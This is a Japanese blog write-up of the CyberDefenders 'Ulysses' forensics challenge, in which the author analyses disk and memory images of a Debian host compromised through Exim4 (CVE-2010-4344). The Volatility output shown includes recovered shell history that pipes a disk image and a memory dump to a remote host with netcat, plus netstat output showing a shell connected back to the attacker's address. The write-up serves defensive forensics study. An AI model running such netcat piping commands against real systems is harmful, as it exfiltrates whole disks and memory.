初めに
どうも、クソ雑魚のなんちゃてエンジニアです。
本記事は CyberDefenders (以下リンク参考)の「Ulysses」にチャレンジした際のWriteupになります
※本チャレンジについてはRed側のペネトレというよりはBlue側の分析力を問われるものになります。
環境準備
ファイルシステムダンプ、メモリダンプ、Volatilityプロファイルがそれぞれ渡されるので環境をREMnux上に作っておきます。
remnux@remnux:~/Downloads/Ulysses$ sudo mount victoria-v8.sda1.img /mnt/ulysses/sda/
remnux@remnux:~/Downloads/Ulysses$ sudo cp Debian5_26.zip /usr/local/lib/python2.7/dist-packages/volatility/plugins/overlays/linux/
remnux@remnux:~/Downloads/Ulysses$
remnux@remnux:~/Downloads/Ulysses$ vol.py --info |grep -i debian
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
from cryptography.hazmat.backends.openssl import backend
LinuxDebian5_26x86 - A Profile for Linux Debian5_26 x86
remnux@remnux:~/Downloads/Ulysses$
一応Volatilityでメモリダンプが読めそうかどうか確認しておきます。
remnux@remnux:~/Downloads/Ulysses$ vol.py -f victoria-v8.memdump.img imageinfo
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
from cryptography.hazmat.backends.openssl import backend
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : No suggestion (Instantiated with LinuxDebian5_26x86)
AS Layer1 : IA32PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/home/remnux/Downloads/Ulysses/victoria-v8.memdump.img)
PAE type : No PAE
DTB : 0x3bc000L
LinuxDebian5_26x86が出てるので読めそうですね。
The attacker was performing a Brute Force attack. What account triggered the alert?
ファイルシステム上のログファイルを見つけます。
remnux@remnux:/mnt/ulysses/sda$ find /mnt/ulysses/sda -name "*log*" 2>/dev/null
/mnt/ulysses/sda/bin/login
/mnt/ulysses/sda/usr/bin/rlogin
/mnt/ulysses/sda/usr/bin/setlogcons
/mnt/ulysses/sda/usr/bin/lastlog
/mnt/ulysses/sda/usr/bin/logname
/mnt/ulysses/sda/usr/bin/savelog
/mnt/ulysses/sda/usr/bin/logger
/mnt/ulysses/sda/usr/bin/slogin
/mnt/ulysses/sda/usr/bin/faillog
/mnt/ulysses/sda/usr/include/lastlog.h
/mnt/ulysses/sda/usr/include/syslog.h
/mnt/ulysses/sda/usr/include/bits/syslog-ldbl.h
/mnt/ulysses/sda/usr/include/bits/syslog.h
/mnt/ulysses/sda/usr/include/bits/syslog-path.h
/mnt/ulysses/sda/usr/include/linux/netfilter/nfnetlink_log.h
/mnt/ulysses/sda/usr/include/linux/netfilter_bridge/ebt_log.h
/mnt/ulysses/sda/usr/include/linux/netfilter_bridge/ebt_ulog.h
/mnt/ulysses/sda/usr/include/sys/syslog.h
/mnt/ulysses/sda/usr/include/sys/klog.h
...省略
/mnt/ulysses/sda/sbin/sulogin
/mnt/ulysses/sda/sbin/logsave
/mnt/ulysses/sda/var/cache/apt/archives/rsyslog_3.18.6-4_i386.deb
/mnt/ulysses/sda/var/cache/apt/archives/logrotate_3.7.1-5_i386.deb
/mnt/ulysses/sda/var/cache/apt/archives/login_1%3a4.1.1-6+lenny1_i386.deb
/mnt/ulysses/sda/var/run/rsyslogd.pid
/mnt/ulysses/sda/var/log
/mnt/ulysses/sda/var/log/pycentral.log
/mnt/ulysses/sda/var/log/daemon.log
/mnt/ulysses/sda/var/log/lastlog
/mnt/ulysses/sda/var/log/exim4/rejectlog
/mnt/ulysses/sda/var/log/exim4/mainlog
/mnt/ulysses/sda/var/log/exim4/paniclog
/mnt/ulysses/sda/var/log/installer/syslog
/mnt/ulysses/sda/var/log/auth.log
/mnt/ulysses/sda/var/log/kern.log
/mnt/ulysses/sda/var/log/apt/term.log
/mnt/ulysses/sda/var/log/user.log
/mnt/ulysses/sda/var/log/syslog
/mnt/ulysses/sda/var/log/lpr.log
/mnt/ulysses/sda/var/log/faillog
/mnt/ulysses/sda/var/log/dpkg.log
/mnt/ulysses/sda/var/log/mail.log
/mnt/ulysses/sda/var/lib/logrotate
/mnt/ulysses/sda/var/lib/dpkg/alternatives/rlogin
/mnt/ulysses/sda/var/lib/dpkg/info/rsyslog.list
/mnt/ulysses/sda/var/lib/dpkg/info/login.preinst
/mnt/ulysses/sda/var/lib/dpkg/info/logrotate.md5sums
/mnt/ulysses/sda/var/lib/dpkg/info/rsyslog.conffiles
/mnt/ulysses/sda/var/lib/dpkg/info/rsyslog.prerm
/mnt/ulysses/sda/var/lib/dpkg/info/login.postinst
/mnt/ulysses/sda/var/lib/dpkg/info/logrotate.conffiles
/mnt/ulysses/sda/var/lib/dpkg/info/logrotate.list
/mnt/ulysses/sda/var/lib/dpkg/info/login.md5sums
/mnt/ulysses/sda/var/lib/dpkg/info/rsyslog.postinst
/mnt/ulysses/sda/var/lib/dpkg/info/rsyslog.preinst
/mnt/ulysses/sda/var/lib/dpkg/info/rsyslog.md5sums
/mnt/ulysses/sda/var/lib/dpkg/info/login.list
/mnt/ulysses/sda/var/lib/dpkg/info/logrotate.preinst
/mnt/ulysses/sda/var/lib/dpkg/info/rsyslog.postrm
/mnt/ulysses/sda/var/lib/dpkg/info/login.conffiles
/mnt/ulysses/sda/var/lib/dpkg/info/logrotate.postrm
/mnt/ulysses/sda/lib/security/pam_loginuid.so
/mnt/ulysses/sda/lib/security/pam_lastlog.so
/mnt/ulysses/sda/lib/security/pam_nologin.so
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/drivers/scsi/qlogicfas408.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/drivers/scsi/pcmcia/qlogic_cs.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/drivers/scsi/qlogicfas.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/drivers/md/dm-log.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/drivers/input/joystick/analog.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/drivers/input/mouse/logibm.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/net/netfilter/nfnetlink_log.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/net/bridge/netfilter/ebt_ulog.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/net/bridge/netfilter/ebt_nflog.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/net/bridge/netfilter/ebt_log.ko
/mnt/ulysses/sda/lib/udev/logger.agent
まぁ問題文から無難にauth.logを見ます。
remnux@remnux:/mnt/ulysses/sda$ cat /mnt/ulysses/sda/var/log/auth.log
Jan 18 09:31:44 victoria login[2001]: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
Jan 18 09:31:44 victoria login[2021]: ROOT LOGIN on 'tty1'
Jan 18 09:58:01 victoria login[1975]: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
Jan 18 09:58:02 victoria login[2000]: ROOT LOGIN on 'tty1'
Jan 18 10:57:37 victoria login[1973]: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
...省略
Feb 6 15:16:46 victoria sshd[2088]: Failed password for invalid user ulysses from 192.168.56.1 port 34441 ssh2
Feb 6 15:16:49 victoria sshd[2088]: pam_unix(sshd:auth): check pass; user unknown
Feb 6 15:16:51 victoria sshd[2088]: Failed password for invalid user ulysses from 192.168.56.1 port 34441 ssh2
Feb 6 15:16:54 victoria sshd[2088]: pam_unix(sshd:auth): check pass; user unknown
Feb 6 15:16:56 victoria sshd[2088]: Failed password for invalid user ulysses from 192.168.56.1 port 34441 ssh2
Feb 6 15:16:56 victoria sshd[2088]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.1
Feb 6 15:16:58 victoria sshd[2090]: Invalid user ulysses from 192.168.56.1
Feb 6 15:16:58 victoria sshd[2090]: Failed none for invalid user ulysses from 192.168.56.1 port 34442 ssh2
Feb 6 15:16:59 victoria sshd[2090]: Failed password for invalid user ulysses from 192.168.56.1 port 34442 ssh2
Feb 6 15:16:59 victoria sshd[2090]: Failed password for invalid user ulysses from 192.168.56.1 port 34442 ssh2
Feb 6 15:17:00 victoria sshd[2090]: Failed password for invalid user ulysses from 192.168.56.1 port 34442 ssh2
Feb 6 15:17:01 victoria sshd[2092]: Invalid user ulysses from 192.168.56.1
Feb 6 15:17:01 victoria sshd[2092]: Failed none for invalid user ulysses from 192.168.56.1 port 34443 ssh2
Feb 6 15:17:01 victoria CRON[2094]: pam_unix(cron:session): session opened for user root by (uid=0)
Feb 6 15:17:02 victoria CRON[2094]: pam_unix(cron:session): session closed for user root
Feb 6 15:17:02 victoria sshd[2092]: Failed password for invalid user ulysses from 192.168.56.1 port 34443 ssh2
Feb 6 15:17:02 victoria sshd[2092]: Failed password for invalid user ulysses from 192.168.56.1 port 34443 ssh2
Feb 6 15:17:02 victoria sshd[2092]: Failed password for invalid user ulysses from 192.168.56.1 port 34443 ssh2
Feb 6 15:17:03 victoria sshd[2097]: Invalid user ulysses from 192.168.56.1
Feb 6 15:17:03 victoria sshd[2097]: Failed none for invalid user ulysses from 192.168.56.1 port 34444 ssh2
Feb 6 15:17:05 victoria sshd[2097]: Failed password for invalid user ulysses from 192.168.56.1 port 34444 ssh2
Feb 6 15:17:07 victoria sshd[2097]: Failed password for invalid user ulysses from 192.168.56.1 port 34444 ssh2
Feb 6 15:17:07 victoria sshd[2097]: Failed password for invalid user ulysses from 192.168.56.1 port 34444 ssh2
Feb 6 15:17:08 victoria sshd[2099]: Invalid user ulysses from 192.168.56.1
Feb 6 15:17:08 victoria sshd[2099]: Failed none for invalid user ulysses from 192.168.56.1 port 34445 ssh2
Feb 6 15:17:12 victoria sshd[2099]: Failed password for invalid user ulysses from 192.168.56.1 port 34445 ssh2
Feb 6 15:17:12 victoria sshd[2099]: Failed password for invalid user ulysses from 192.168.56.1 port 34445 ssh2
Feb 6 15:17:12 victoria sshd[2099]: Failed password for invalid user ulysses from 192.168.56.1 port 34445 ssh2
Feb 6 15:19:25 victoria sshd[2153]: Invalid user ulysses from 192.168.56.1
Feb 6 15:19:25 victoria sshd[2153]: Failed none for invalid user ulysses from 192.168.56.1 port 34475 ssh2
Feb 6 15:19:27 victoria sshd[2153]: pam_unix(sshd:auth): check pass; user unknown
Feb 6 15:19:27 victoria sshd[2153]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.1
Feb 6 15:19:29 victoria sshd[2153]: Failed password for invalid user ulysses from 192.168.56.1 port 34475 ssh2
Feb 6 15:19:32 victoria sshd[2153]: pam_unix(sshd:auth): check pass; user unknown
Feb 6 15:19:34 victoria sshd[2153]: Failed password for invalid user ulysses from 192.168.56.1 port 34475 ssh2
Feb 6 15:19:35 victoria sshd[2153]: Failed password for invalid user ulysses from 192.168.56.1 port 34475 ssh2
Feb 6 15:19:35 victoria sshd[2153]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.1
Feb 6 15:20:54 victoria sshd[2157]: Invalid user ulysses from 192.168.56.1
Feb 6 15:20:54 victoria sshd[2157]: Failed none for invalid user ulysses from 192.168.56.1 port 44616 ssh2
Feb 6 15:20:58 victoria sshd[2157]: pam_unix(sshd:auth): check pass; user unknown
Feb 6 15:20:58 victoria sshd[2157]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.1
Feb 6 15:21:00 victoria sshd[2157]: Failed password for invalid user ulysses from 192.168.56.1 port 44616 ssh2
Feb 6 15:21:03 victoria sshd[2157]: pam_unix(sshd:auth): check pass; user unknown
Feb 6 15:21:05 victoria sshd[2157]: Failed password for invalid user ulysses from 192.168.56.1 port 44616 ssh2
Feb 6 15:21:09 victoria sshd[2157]: pam_unix(sshd:auth): check pass; user unknown
Feb 6 15:21:10 victoria sshd[2157]: Failed password for invalid user ulysses from 192.168.56.1 port 44616 ssh2
Feb 6 15:21:10 victoria sshd[2157]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.1
remnux@remnux:/mnt/ulysses/sda$
パッとuser名が見えると思います。
Ans: ulysses
How many were failed attempts there?
grepでFailedを引っかけます。
Ans: 32
What kind of system runs on the targeted server?
issueを確認します。
Ans: Debian GNU/Linux 5.0
What is the victim's IP address?
linux_netstatで確認できます。
remnux@remnux:~/Downloads/Ulysses$ vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_netstat
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
from cryptography.hazmat.backends.openssl import backend
UNIX 2190 udevd/776
UDP 0.0.0.0 : 111 0.0.0.0 : 0 portmap/1429
TCP 0.0.0.0 : 111 0.0.0.0 : 0 LISTEN portmap/1429
UDP 0.0.0.0 : 769 0.0.0.0 : 0 rpc.statd/1441
UDP 0.0.0.0 :38921 0.0.0.0 : 0 rpc.statd/1441
TCP 0.0.0.0 :39296 0.0.0.0 : 0 LISTEN rpc.statd/1441
UDP 0.0.0.0 : 68 0.0.0.0 : 0 dhclient3/1624
UNIX 5069 dhclient3/1624
UNIX 4617 rsyslogd/1661 /dev/log
UNIX 4636 acpid/1672 /var/run/acpid.socket
UNIX 4638 acpid/1672
TCP :: : 22 :: : 0 LISTEN sshd/1687
TCP 0.0.0.0 : 22 0.0.0.0 : 0 LISTEN sshd/1687
TCP :: : 25 :: : 0 LISTEN exim4/1942
TCP 0.0.0.0 : 25 0.0.0.0 : 0 LISTEN exim4/1942
UNIX 5132 login/1990
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 : 25 192.168.56.101 :37202 CLOSE sh/2065
TCP 192.168.56.102 : 25 192.168.56.101 :37202 CLOSE sh/2065
TCP 192.168.56.102 :56955 192.168.56.1 : 8888 ESTABLISHED nc/2169
remnux@remnux:~/Downloads/Ulysses$
Ans: 192.168.56.102
What are the attacker's two IP addresses? Format: comma-separated in ascending order
先ほどのコマンドで確認できます。
Ans: 192.168.56.1,192.168.56.101
What is the "nc" service PID number that was running on the server?
linux_pslistコマンドで確認できます。
remnux@remnux:~/Downloads/Ulysses$ vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_pslist
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
from cryptography.hazmat.backends.openssl import backend
Offset Name Pid PPid Uid Gid DTB Start Time
---------- -------------------- --------------- --------------- --------------- ------ ---------- ----------
0xcf42f900 init 1 0 0 0 0x0f4b8000 2011-02-06 12:04:09 UTC+0000
0xcf42f4e0 kthreadd 2 0 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42f0c0 migration/0 3 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42eca0 ksoftirqd/0 4 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42e880 watchdog/0 5 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42e460 events/0 6 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42e040 khelper 7 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf4a1a40 kblockd/0 39 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf4a1200 kacpid 41 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf45d140 kacpi_notify 42 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf46c940 kseriod 86 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf43f100 pdflush 123 2 0 0 ---------- 2011-02-06 12:04:10 UTC+0000
0xcf45d980 pdflush 124 2 0 0 ---------- 2011-02-06 12:04:10 UTC+0000
0xcf45d560 kswapd0 125 2 0 0 ---------- 2011-02-06 12:04:10 UTC+0000
0xcf43f520 aio/0 126 2 0 0 ---------- 2011-02-06 12:04:10 UTC+0000
0xcf45c4e0 ksuspend_usbd 581 2 0 0 ---------- 2011-02-06 12:04:14 UTC+0000
0xcf48d1c0 khubd 582 2 0 0 ---------- 2011-02-06 12:04:14 UTC+0000
0xcf46d9c0 ata/0 594 2 0 0 ---------- 2011-02-06 12:04:15 UTC+0000
0xcf802a00 ata_aux 595 2 0 0 ---------- 2011-02-06 12:04:15 UTC+0000
0xcf43e080 scsi_eh_0 634 2 0 0 ---------- 2011-02-06 12:04:17 UTC+0000
0xcf45c0c0 kjournald 700 2 0 0 ---------- 2011-02-06 12:04:18 UTC+0000
0xcf46d5a0 udevd 776 1 0 0 0x0f5b2000 2011-02-06 12:04:21 UTC+0000
0xce978620 kpsmoused 1110 2 0 0 ---------- 2011-02-06 12:04:27 UTC+0000
0xce9796a0 portmap 1429 1 1 1 0x0eddf000 2011-02-06 12:04:35 UTC+0000
0xce973b00 rpc.statd 1441 1 102 0 0x0f8b3000 2011-02-06 12:04:35 UTC+0000
0xcf45c900 dhclient3 1624 1 0 0 0x0ec3d000 2011-02-06 12:04:39 UTC+0000
0xce972660 rsyslogd 1661 1 0 0 0x0e7ed000 2011-02-06 12:04:40 UTC+0000
0xcf43ece0 acpid 1672 1 0 0 0x0f8a8000 2011-02-06 12:04:40 UTC+0000
0xce979ac0 sshd 1687 1 0 0 0x0fa65000 2011-02-06 12:04:41 UTC+0000
0xcf45cd20 exim4 1942 1 101 103 0x0e7bc000 2011-02-06 12:04:44 UTC+0000
0xcf803a80 cron 1973 1 0 0 0x0f815000 2011-02-06 12:04:45 UTC+0000
0xcfaad720 login 1990 1 0 0 0x0eecf000 2011-02-06 12:04:45 UTC+0000
0xcf48c560 getty 1992 1 0 0 0x0ea31000 2011-02-06 12:04:45 UTC+0000
0xcf803240 getty 1994 1 0 0 0x0f671000 2011-02-06 12:04:45 UTC+0000
0xcf4a1620 getty 1996 1 0 0 0x0f838000 2011-02-06 12:04:45 UTC+0000
0xcf46cd60 getty 1998 1 0 0 0x0f83d000 2011-02-06 12:04:45 UTC+0000
0xcf4a0180 getty 2000 1 0 0 0x0e89e000 2011-02-06 12:04:45 UTC+0000
0xcf8021c0 bash 2042 1990 0 0 0x0eecc000 2011-02-06 14:04:38 UTC+0000
0xcfaacee0 sh 2065 1 0 0 0x0f517000 2011-02-06 14:07:15 UTC+0000
0xcfaac280 memdump 2168 2042 0 0 0x08088000 2011-02-06 14:42:27 UTC+0000
0xcf43e8c0 nc 2169 2042 0 0 0x08084000 2011-02-06 14:42:27 UTC+0000
remnux@remnux:~/Downloads/Ulysses$
Ans: 2169
What service was exploited to gain access to the system? (one word)
サービス名が末尾4の文字で終わるみたいです。
であればexim4か?と思いつつももう少し調査します。
linux_bashでコマンドを確認します。
remnux@remnux:~/Downloads/Ulysses$ vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_bash
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
from cryptography.hazmat.backends.openssl import backend
Pid Name Command Time Command
-------- -------------------- ------------------------------ -------
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get remove exim4
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get remove exim4-base
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get remove exim4-daemon-light
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -l | grep exim
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get remove exim4-config
2042 bash 2011-02-06 14:04:39 UTC+0000 ls -a
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg --purge
2042 bash 2011-02-06 14:04:39 UTC+0000 pwd
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get remove exim
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -l | grep exim
2042 bash 2011-02-06 14:04:39 UTC+0000 mkdir exim4
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -i exim4-config_4.69-9_all.deb
2042 bash 2011-02-06 14:04:39 UTC+0000 cd exim4/
2042 bash 2011-02-06 14:04:39 UTC+0000 scp yom@192.168.56.1:/home/yom/temporary/exmi4/* .
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -i exim4-base_4.69-9_i386.deb
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -i exim4-base_4.69-9_i386.deb
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -i --ignore-depends=exim4-base,exim4-daemon-light exim4_4.69-9_all.deb
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -i exim4_4.69-9_all.deb
2042 bash 2011-02-06 14:04:39 UTC+0000 /etc/init.d/networking restart
2042 bash 2011-02-06 14:04:39 UTC+0000 ifconfig
2042 bash 2011-02-06 14:04:39 UTC+0000 /etc/init.d/networking start
2042 bash 2011-02-06 14:04:39 UTC+0000 halt
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get install openssh-server
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get install openssh-server
2042 bash 2011-02-06 14:04:39 UTC+0000 cd /etc/exim4/
2042 bash 2011-02-06 14:04:39 UTC+0000 scp yom@192.168.56.1:/home/yom/temporary/exim4/* .
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -i exim4-daemon-light_4.69-9_i386.deb
2042 bash 2011-02-06 14:04:39 UTC+0000 cd ..
2042 bash 2011-02-06 14:04:39 UTC+0000 ls
2042 bash 2011-02-06 14:04:39 UTC+0000 rm -rf exim4/
2042 bash 2011-02-06 14:04:39 UTC+0000 vi .bash
2042 bash 2011-02-06 14:04:39 UTC+0000 vi .ssh/known_hosts
2042 bash 2011-02-06 14:04:39 UTC+0000 vi .bash_history
2042 bash 2011-02-06 14:04:39 UTC+0000 vi update-exim4.conf.conf
2042 bash 2011-02-06 14:04:39 UTC+0000 update-exim4.conf
2042 bash 2011-02-06 14:04:39 UTC+0000 halt
2042 bash 2011-02-06 14:04:39 UTC+0000 reboot
2042 bash 2011-02-06 14:04:39 UTC+0000 whereis gcc
2042 bash 2011-02-06 14:04:39 UTC+0000 whereis memdump
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get install memdump
2042 bash 2011-02-06 14:04:39 UTC+0000 halt
2042 bash 2011-02-06 14:04:39 UTC+0000 ifconfig
2042 bash 2011-02-06 14:04:39 UTC+0000 ping 192.168.56.1
2042 bash 2011-02-06 14:04:39 UTC+0000 mount
2042 bash 2011-02-06 14:04:39 UTC+0000 sudo dd if=/dev/sda | nc 192.168.56.1 4444
2042 bash 2011-02-06 14:04:39 UTC+0000 dd if=/dev/sda | nc 192.168.56.1 4444
2042 bash 2011-02-06 14:04:39 UTC+0000 dd if=/dev/sda1 | nc 192.168.56.1 4444
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get install memdump
2042 bash 2011-02-06 14:04:39 UTC+0000 netstat -ant
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get install ddrescue
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get install dcfldd
2042 bash 2011-02-06 14:04:39 UTC+0000 ls /dev/kmem
2042 bash 2011-02-06 14:04:39 UTC+0000 ls /dev/mem
2042 bash 2011-02-06 14:04:39 UTC+0000 halt
2042 bash 2011-02-06 14:04:39 UTC+0000 ifconfig
2042 bash 2011-02-06 14:04:39 UTC+0000 ifconfig
2042 bash 2011-02-06 14:04:39 UTC+0000 reboot
2042 bash 2011-02-06 14:04:46 UTC+0000 ifconfig
2042 bash 2011-02-06 14:24:43 UTC+0000 dd if=/dev/sda1 | nc 192.168.56.1 8888
2042 bash 2011-02-06 14:42:29 UTC+0000 memdump | nc 192.168.56.1 8888
remnux@remnux:~/Downloads/Ulysses$
exim4関連をいじくっているのでこれ見たいですね。
Ans: Exim4
What is the CVE number of exploited vulnerability?
exim4-base_4.69-9をダウンロードしているのでこのVersionの脆弱性を調査します。
すると以下の記事を発見できます。
このRCEのCVEでしょうね。
Ans: CVE-2010-4344
During this attack, the attacker downloaded two files to the server. Provide the name of the compressed file.
??.???の文字のファイルをlinux_enumerate_filesで列挙します。
remnux@remnux:~/Downloads/Ulysses$ vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_enumerate_files | grep "..\....$"
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
from cryptography.hazmat.backends.openssl import backend
0xcf1e2e48 39467 /tmp/rk.tar
0x0 ------------------------- /var/spool/exim4/s.c.gch
0xcf1364ac 8318 /var/log/news/news.err
0xcf136a70 8312 /var/log/mail.err
0xcf1340d4 8307 /var/log/user.log
0xcf1342c0 8306 /var/log/mail.log
0xcf1344ac 8305 /var/log/lpr.log
0xcf134698 8302 /var/log/kern.log
0xcf134884 8301 /var/log/daemon.log
0xcf134c5c 8296 /var/log/auth.log
0xcf11a884 7503 /var/run/portmap.pid
0xcf15a0d4 8294 /var/run/crond.pid
0xcf11c884 8278 /var/run/rpc.statd.pid
0x0 ------------------------- /usr/include/gnu/stubs-32.h.gch
0x0 ------------------------- /usr/include/gnu/stubs.h.gch
0x0 ------------------------- /usr/include/bits/wordsize.h.gch
0x0 ------------------------- /usr/include/sys/cdefs.h.gch
0x0 ------------------------- /usr/include/features.h.gch
0x0 ------------------------- /usr/include/stdio.h.gch
0xcf2542c0 27638 /usr/lib/libgmp.so.3.4.2
0xcf254698 27642 /usr/lib/libmpfr.so.1.1.1
0x0 ------------------------- /usr/lib/gcc/i486-linux-gnu/4.3/include-fixed/features.h.gch
0x0 ------------------------- /usr/lib/gcc/i486-linux-gnu/4.3/include-fixed/stdio.h.gch
0x0 ------------------------- /usr/lib/gcc/i486-linux-gnu/4.3/include/stddef.h.gch
0x0 ------------------------- /usr/lib/gcc/i486-linux-gnu/4.3/include/features.h.gch
0x0 ------------------------- /usr/lib/gcc/i486-linux-gnu/4.3/include/stdio.h.gch
0xcf2570d4 21854 /usr/lib/gcc/i486-linux-gnu/4.3.2
0x0 ------------------------- /usr/lib/perl/5.10.0/vars.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/File/Spec.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/Fcntl.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/IO.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/SelectSaver.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/Symbol.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/IO/Handle.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/IO/Seekable.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/IO/File.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/strict.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/FileHandle.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/XSLoader.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/warnings.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/Exporter.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/Carp.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/Socket.pmc
0x0 ------------------------- /usr/lib/perl5/vars.pmc
0x0 ------------------------- /usr/lib/perl5/Fcntl.pmc
0x0 ------------------------- /usr/lib/perl5/IO.pmc
0x0 ------------------------- /usr/lib/perl5/SelectSaver.pmc
0x0 ------------------------- /usr/lib/perl5/Symbol.pmc
0x0 ------------------------- /usr/lib/perl5/strict.pmc
0x0 ------------------------- /usr/lib/perl5/FileHandle.pmc
0x0 ------------------------- /usr/lib/perl5/XSLoader.pmc
0x0 ------------------------- /usr/lib/perl5/warnings.pmc
0x0 ------------------------- /usr/lib/perl5/Exporter.pmc
0x0 ------------------------- /usr/lib/perl5/Carp.pmc
0x0 ------------------------- /usr/lib/perl5/Socket.pmc
0xcf1552c0 25174 /usr/lib/libgcrypt.so.11.4.4
0xcf155698 25167 /usr/lib/libgpg-error.so.0.3.0
0xcf155e48 25183 /usr/lib/libgnutls.so.26.4.6
0xcf13f4ac 23221 /usr/lib/libkrb5support.so.0.1
0xcf13f884 23220 /usr/lib/libk5crypto.so.3.1
0xcf13fc5c 23218 /usr/lib/libkrb5.so.3.3
0xcf13d0d4 23219 /usr/lib/libgssapi_krb5.so.2.2
0xcf1324ac 24264 /usr/lib/libz.so.1.2.3.3
0x0 ------------------------- /usr/lib/i486-linux-gnu/4.3.2
0xcf16a2c0 38010 /usr/lib/i686/cmov/libssl.so.0.9.8
0xcf13dc5c 38011 /usr/lib/i686/cmov/libcrypto.so.0.9.8
0x0 ------------------------- /usr/local/include/stddef.h.gch
0x0 ------------------------- /usr/local/include/features.h.gch
0x0 ------------------------- /usr/local/include/stdio.h.gch
